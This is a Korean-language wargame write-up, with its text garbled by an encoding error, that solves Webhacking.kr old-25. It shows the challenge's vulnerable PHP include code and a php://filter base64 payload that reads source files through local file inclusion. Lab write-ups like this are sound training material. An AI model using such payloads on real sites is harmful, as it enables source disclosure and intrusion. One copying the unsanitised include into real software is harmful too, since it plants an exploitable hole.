Home [Wargame] Webhacking.kr old-25 (PHP)
Post
Cancel

[Wargame] Webhacking.kr old-25 (PHP)

๐Ÿšฉ ๋ฌธ์ œ ํŒŒ์•…


image

๋ฌธ์ œ ํŽ˜์ด์ง€์— ๋“ค์–ด๊ฐ€๋ฉด /?file=hello ๋ผ๋Š” url๋กœ ์—ฐ๊ฒฐ๋˜๊ณ , hello.php ๋ผ๋Š” ํŒŒ์ผ์˜ ๋‚ด์šฉ์ด ์ถœ๋ ฅ๋˜๋Š” ๊ฒƒ์œผ๋กœ ๋ณด์ด๋Š” ํŽ˜์ด์ง€๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค. ์ด๋กœ ๋ณด์•„, url์˜ ํŒŒ๋ผ๋ฏธํ„ฐ๋กœ ํŒŒ์ผ๋ช…์„ ์ „๋‹ฌํ•˜๋ฉด ํ•ด๋‹น ํŒŒ์ผ์„ ์ฝ์„ ์ˆ˜ ์žˆ๋Š” ๊ฒƒ์„ ์•Œ ์ˆ˜ ์žˆ๋‹ค.


/?file=index๋กœ ์š”์ฒญํ•˜๋ฉด ์•„๋ฌด๋Ÿฐ ๊ฒฐ๊ณผ๋„ ๋ฐ›์„ ์ˆ˜ ์—†์œผ๋‚˜, /?file=flag๋กœ ์š”์ฒญํ•˜๋ฉด ์œ„์™€ ๊ฐ™์ด FLAG is in the code๋ผ๋Š” ๋ฌธ์ž์—ด์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค. ์ด๋Š” flag.php๋ผ๋Š” ํŒŒ์ผ์„ ์ฝ์€ ๊ฒƒ์ด ์•„๋‹ˆ๋ผ ์‹คํ–‰ํ•œ ๊ฒƒ์œผ๋กœ ์œ ์ถ”ํ•  ์ˆ˜ ์žˆ๊ณ , ํ”Œ๋ž˜๊ทธ ๊ฐ’์€ ํ•ด๋‹น ํŒŒ์ผ์„ ์ฝ์–ด์•ผ ์•Œ ์ˆ˜ ์žˆ๋Š” ๊ฒƒ์œผ๋กœ ์œ ์ถ”ํ•  ์ˆ˜ ์žˆ๋‹ค.



๐Ÿšฉ ๋ฌธ์ œ ํ’€์ด


์ด๋ฅผ ํ•ด๊ฒฐํ•˜๊ธฐ ์œ„ํ•ด์„œ๋Š” PHP Wrappers๋ผ๋Š” ๊ฐœ๋…์ด ํ•„์š”ํ•˜๋‹ค. PHP Wrapper๋ž€ ํŒŒ์ผ ์‹œ์Šคํ…œ ํ•จ์ˆ˜์™€ ํ•จ๊ป˜ ์‚ฌ์šฉํ•˜๊ธฐ ์œ„ํ•œ ๋‹ค์–‘ํ•œ URL ์Šคํƒ€์ผ ํ”„๋กœํ† ์ฝœ์„ ๋‚ด์žฅ wrapper๊ฐ€ ์ œ๊ณตํ•˜๋Š” ๊ฒƒ์„ ๋งํ•œ๋‹ค. PHP ๊ณต์‹ ๋ฌธ์„œ์—์„œ ์ž์„ธํ•œ ๋‚ด์šฉ์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค.


image

๊ณต์‹ ๋ฌธ์„œ์—์„œ wrapper์˜ ์ข…๋ฅ˜๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋Š”๋ฐ, ์ด ์ค‘์—์„œ ์šฐ๋ฆฌ๋Š” ํŒŒ์ผ์„ ์ฝ์–ด์•ผ ํ•˜๊ธฐ ๋•Œ๋ฌธ์— I/O streams์™€ ๊ด€๋ จ๋œ php:// wrapper๋ฅผ ์‚ฌ์šฉํ•  ๊ฒƒ์ด๋‹ค.


๊ทธ ์ค‘ php://filter๋ฅผ ์‚ฌ์šฉํ•˜๋ฉด ํŒŒ๋ผ๋ฏธํ„ฐ๋ฅผ ์ด์šฉํ•˜์—ฌ ํŠน์ • ํŒŒ์ผ ๊ฒฝ๋กœ์™€ ํƒ€์ž… ๋“ฑ์„ ์ง€์ •ํ•  ์ˆ˜ ์žˆ๋‹ค. php์—์„œ ์ œ๊ณตํ•˜๋Š” filter์˜ ๋ฆฌ์ŠคํŠธ๋Š” ๊ณต์‹ ๋ฌธ์„œ์—์„œ ์ฐพ์•„๋ณผ ์ˆ˜ ์žˆ๋Š”๋ฐ, ์—ฌ๋Ÿฌ ํ•„ํ„ฐ๋ฅผ ์ด์šฉํ•˜์—ฌ ํŒŒ์ผ์„ ์ถ”์ถœํ•  ์ˆ˜ ์žˆ์—ˆ๋‹ค.


์‚ฌ์šฉ ๋ฐฉ๋ฒ•์€ php://filter/read={์ ์šฉํ•˜๋ ค๋Š” ํ•„ํ„ฐ}/resource={ํŒŒ์ผ ๊ฒฝ๋กœ}์ด๋‹ค.

ํŒŒ์ผ์„ ์ถ”์ถœํ•  ์ˆ˜ ์žˆ์—ˆ๋˜ ํ•„ํ„ฐ๋Š” string.rot13, convert.base64-encode, convert.quoted-printable-encode ๋“ฑ์ด ์žˆ์—ˆ๋‹ค.


image

์‚ฌ์šฉ ๊ฐ€๋Šฅํ•œ ํ•„ํ„ฐ ์ค‘ convert.base64-encode๋ฅผ ์ด์šฉํ•˜์—ฌ url ํŽ˜์ด๋กœ๋“œ๋ฅผ ๋งŒ๋“ค๋ฉด php://filter/read=convert.base64-encode/resource=./flag์™€ ๊ฐ™์ด ๊ตฌ์„ฑํ•  ์ˆ˜ ์žˆ๊ณ , ์ด๋ฅผ ํฌํ•จํ•˜์—ฌ ์š”์ฒญํ•˜๋ฉด ์œ„์™€ ๊ฐ™์ด base64๋กœ ์ธ์ฝ”๋”ฉ๋œ ๊ฐ’์„ ์–ป์„ ์ˆ˜ ์žˆ๋‹ค.


1
2
3
4
<?php
  echo "FLAG is in the code";
  $flag = "FLAG{this_is_your_first_flag}";
?>

์ด๋ฅผ decode ํ•œ ๊ฐ’์—์„œ ํ”Œ๋ž˜๊ทธ๋ฅผ ์ฐพ์„ ์ˆ˜ ์žˆ๋‹ค.



๐Ÿšฉ ์ถ”๊ฐ€ ๋ถ„์„


1
2
3
4
5
6
7
8
9
10
11
<?php
  echo("<pre>");
  system("ls -al");
  echo("</pre>");
  if(!$_GET['file']) echo("<meta http-equiv=refresh content=0;url=?file=hello>");
  echo "<hr><textarea rows=10 cols=100>";
  $file = $_GET['file'].".php";
  if($file == "index.php") exit(); // anti infinite loop
  include $file;
  echo "</textarea>";
?>

๊ฐ™์€ ๋ฐฉ์‹์œผ๋กœ index.php ํŒŒ์ผ์„ ์ถ”์ถœํ•  ์ˆ˜ ์žˆ๋Š”๋ฐ, include $file; ๋ถ€๋ถ„์—์„œ LFI ์ทจ์•ฝ์ ์ด ๋ฐœ์ƒํ•˜๋Š” ๊ฒƒ์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ์—ˆ๋‹ค.

[PortSwigger] Academy: Path traversal

[PortSwigger] Academy: Server-side request forgery (SSRF) attacks